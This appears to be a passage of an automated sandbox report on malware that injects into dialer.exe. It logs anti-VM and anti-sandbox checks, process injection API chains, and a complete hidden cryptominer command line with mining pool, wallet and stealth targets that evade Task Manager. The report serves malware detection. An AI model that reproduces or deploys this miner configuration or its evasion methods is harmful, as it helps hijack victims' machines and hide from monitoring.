          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Contains functionality to compare user and computer (likely to detect sandboxes)
          Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,23_2_00000001400010C0
          Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,62_2_00000001400010C0
          Query firmware table information (likely to detect VMs)
          Source: C:\Windows\System32\dialer.exeSystem information queried: FirmwareTableInformation
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F710000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2438700274.000001DD5F718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
          Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --ALGO=RX/0 --URL=POOL.SUPPORTXMR.COM:80 --USER="46M39DM1DQJFKUNT3T2KIHNU6QQJMRF79J31FSBTBNAFUX9B2GAWYSJLFADQ5MHQR4M6C8JJRFXWLPXDHAPUCRHE3MRBJTW" --PASS="ULTIMA" --CPU-MAX-THREADS-HINT=20 --CINIT-WINRING="YYCJBDWXJAOE.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.0" --CINIT-IDLE-WAIT=10 --CINIT-IDLE-CPU=80 --CINIT-ID="IKZKMIIBPWTVHLGB"
          Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DIALER.EXE--ALGO=RX/0--URL=POOL.SUPPORTXMR.COM:80--USER=46M39DM1DQJFKUNT3T2KIHNU6QQJMRF79J31FSBTBNAFUX9B2GAWYSJLFADQ5MHQR4M6C8JJRFXWLPXDHAPUCRHE3MRBJTW--PASS=ULTIMA--CPU-MAX-THREADS-HINT=20--CINIT-WINRING=YYCJBDWXJAOE.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.0--CINIT-IDLE-WAIT=10--CINIT-IDLE-CPU=80--CINIT-ID=IKZKMIIBPWTVHLGB
          Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F727000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2438700274.000001DD5F718000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2438873553.000001DD5F726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEEY
          Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F710000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2438700274.000001DD5F718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEEAST
          Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE!
          Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F727000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000002.3310862683.000001DD5F685000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2438700274.000001DD5F718000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000003.2438873553.000001DD5F726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4424Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5363Jump to behavior
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 8580Jump to behavior
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 1418Jump to behavior
          Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9927Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7352
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2246
          Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9872
          Source: C:\Windows\System32\dialer.exeWindow / User API: threadDelayed 1817
          Source: C:\ProgramData\Screenshots\Lightshot.exeDropped PE file which has not been started: C:\Windows\Temp\yycjbdwxjaoe.sysJump to dropped file
          Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_36-14953
          Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_40-14927
          Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_23-480
          Source: C:\Users\user\Desktop\gem2.exeAPI coverage: 8.3 %
          Source: C:\Windows\System32\lsass.exeAPI coverage: 6.6 %
          Source: C:\ProgramData\Screenshots\Lightshot.exeAPI coverage: 8.3 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\dialer.exeAPI coverage: 1.2 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 4.8 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 6.7 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408Thread sleep count: 4424 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408Thread sleep count: 5363 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep time: -8301034833169293s >= -30000sJump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 8180Thread sleep count: 8580 > 30Jump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 8180Thread sleep time: -8580000s >= -30000sJump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 8180Thread sleep count: 1418 > 30Jump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 8180Thread sleep time: -1418000s >= -30000sJump to behavior
          Source: C:\Windows\System32\lsass.exe TID: 6576Thread sleep count: 9927 > 30Jump to behavior
          Source: C:\Windows\System32\lsass.exe TID: 6576Thread sleep time: -9927000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6728Thread sleep count: 7352 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3628Thread sleep count: 2246 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5016Thread sleep time: -8301034833169293s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4996Thread sleep count: 243 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4996Thread sleep time: -243000s >= -30000s
          Source: C:\Windows\System32\dwm.exe TID: 2820Thread sleep count: 9872 > 30
          Source: C:\Windows\System32\dwm.exe TID: 2820Thread sleep time: -9872000s >= -30000s
          Source: C:\Windows\System32\dialer.exe TID: 7656Thread sleep count: 1817 > 30
          Source: C:\Windows\System32\dialer.exe TID: 7656Thread sleep time: -181700s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 7784Thread sleep count: 253 > 30
          Source: C:\Windows\System32\svchost.exe TID: 7784Thread sleep time: -253000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3292Thread sleep count: 253 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3292Thread sleep time: -253000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 7844Thread sleep count: 253 > 30
          Source: C:\Windows\System32\svchost.exe TID: 7844Thread sleep time: -253000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 7840Thread sleep count: 251 > 30
          Source: C:\Windows\System32\svchost.exe TID: 7840Thread sleep time: -251000s >= -30000s
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
          Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
          Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
          Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E85898DCE0 FindFirstFileExW,29_2_000001E85898DCE0
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000140AE86DCE0 FindFirstFileExW,36_2_00000140AE86DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 40_2_00000195DD5CDCE0 FindFirstFileExW,40_2_00000195DD5CDCE0
          Source: C:\Windows\System32\dwm.exeCode function: 41_2_000001160CBEDCE0 FindFirstFileExW,41_2_000001160CBEDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000257E10ADCE0 FindFirstFileExW,66_2_00000257E10ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000001F28C93DCE0 FindFirstFileExW,67_2_000001F28C93DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_000001CA9854DCE0 FindFirstFileExW,68_2_000001CA9854DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001D26531DCE0 FindFirstFileExW,69_2_000001D26531DCE0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
          Source: dialer.exe, 00000040.00000002.3307064888.0000020E96570000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: "NAy0{ht|GmYv;Yv&\z`yf`2{h0|3JAP[nX*[Csk9xUUPdBmsAEBO'`NK[YwmVL@dECrcyjxc|wGn~k}yc_BqA(k:F1"2?=n/vmCI^Hj_nX?Dx~#YBS/bASD
          Source: dialer.exe, 00000040.00000002.3307064888.0000020E96570000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _E(;`o1=_Un[=qRa!%^LCS3KoB~d9Ar/W[(cIjxxiWfzo_@$}?rna[.KDc`Z{>Xquh^b~zQ@52IFvovMCIU?!J9kie?cc[B A?iFficLJKgg~=/
          Source: lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
          Source: dialer.exe, 00000040.00000002.3307064888.0000020E96570000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 3Qg+@y9[b_E?a_pEpVkIzd1<PHza&Fc^S.QV@3ky2wVBDPbgr]FZPrlyH8rgof[}lN|ZUe`eLJn|qdYmYN\&zo~va?w%&_|ppM=Jz5c>dO3z]y[`9|=#}IZDD?7f{@cB{R]c)xj{9dPgl&|bhMN|@Xye8>-K:%c#_tdapBpgbFf>SrzCYS{#|r1auX3H{%YCD"Y*/v`9vNT|^SsYAr{[zw=`x>S=&%|F@(ifZQ`>VGrz0{MXhY?q}FG8NUL=NPa&LX@TCDF<AKii:yvs:)Q`cY=ZO"Xaa~s$S,'<zxmya<@yA~<gLtYGxtKnB>HgFsFV_Rqz{*1Eaw`lE<c$l(p%Lxp_RAPaZ 8liiAt}7]TY?UIDPc]i)d% u=VUE;aX@XnFjxx@5le2kxcMyp]otRPVVA>LH3a"yaMoi<a@vEgY;V|q%cQ9B\as1J}9&Xgof^vlSFa{6?#C5lC9@/}G_kcnn`=NILaSZAN[)e|}v|'tkO
          Source: dialer.exe, 00000040.00000002.3307064888.0000020E96570000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LwX<m=KcPysmP1DqVmciT?uHP`UbgXM'|oG8EHAi|r#'y5YGpx{h1Hc`z"Ex|y\^C.dmDw:{l%EvAqYyOC:>Qg1}Adv?x^yuNELySH7CmvoYfV\xkVOxO[Mj[vSn@`oyJyZmQCAxov{U@Y9QsiOmrZ[[dPTzAno"U5K;JeDg]z#l%Mn [XR}A9A:EBcDXPaAi78IlIgoBrYlh(}\mry[HKuOHf<]cKY`AEKCiclhCN{YGjj8TWyjQck]o{VsFtX#u2q8YwWw?RZG8P08zY8Jk"nhDCby@wCq
          Source: dialer.exe, 00000040.00000002.3307064888.0000020E96570000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: MP^1J^bijiXU}bRWCW|SG^z]v90[%?LcJ]{9|HgfSf&fd"_{8Y-INaF4)J?Ru]GrMJPP:IMjciXayz9vjdKyN>QnZf~<&v2cDWUS8Y6<Hdj b$knoFlmFiqHe8LU.FlnJURBD?kWf
          Source: svchost.exe, 00000028.00000000.2101662137.00000195DD66A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F649000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000041.00000002.3310862683.000001DD5F6A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 00000044.00000002.3308159885.000001CA97800000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
          Source: lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
          Source: dialer.exe, 00000040.00000002.3307064888.0000020E96570000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Uc8w[ncYRpnosipO.~YeN1B\_V#SM<}(X|JfN6vK$<"PQKYR1{88CKeyb]{FoZb|Fk9K{3d?/V @p9W@0M`Zeh7[[DFgs[A+RgV2DhvG{/gN5[KC1oFpdvZ\%[f%C>}VJ?=Mte{{"|m>}QJCWlzQ<3@>fc-_jp%*Wluh|0DSTZ?HI>\Ik`<D?68KySG<izpZLN<FxK}Fg]y;Bd}]3aaG;1[bVMCIc\P}kaNmezyJTrY!xQqN*GdTwuHF$[Si+Z$}18kTl1=KCXEXm'|Jr?fpXEbb&VvlBc!RPcel^NjhGb|nj}Gl*ak9{AwmS{Zy10r|9'DQUTM&ECP^KqQ}0pYgEvWDU{eR`f`sWNMiTL>
          Source: dwm.exe, 00000029.00000002.3321516925.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PointVMware&P
          Source: dwm.exe, 00000029.00000002.3321516925.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000=
          Source: lsass.exe, 00000024.00000002.3309813323.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096574533.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.3309549964.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000028.00000000.2101503020.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000043.00000002.3318145585.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000043.00000000.2135584024.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000044.00000000.2137364654.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000044.00000002.3308442354.000001CA9782A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: dwm.exe, 00000029.00000002.3321516925.0000011607ED0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_23-413
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_62-468
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_65-91
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E858987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000001E858987D90
          Source: C:\Windows\System32\dialer.exeCode function: 65_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,65_2_00000001408460F0
          Source: C:\Windows\System32\dialer.exeCode function: 23_2_00000001400017EC GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree,23_2_00000001400017EC
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\dialer.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
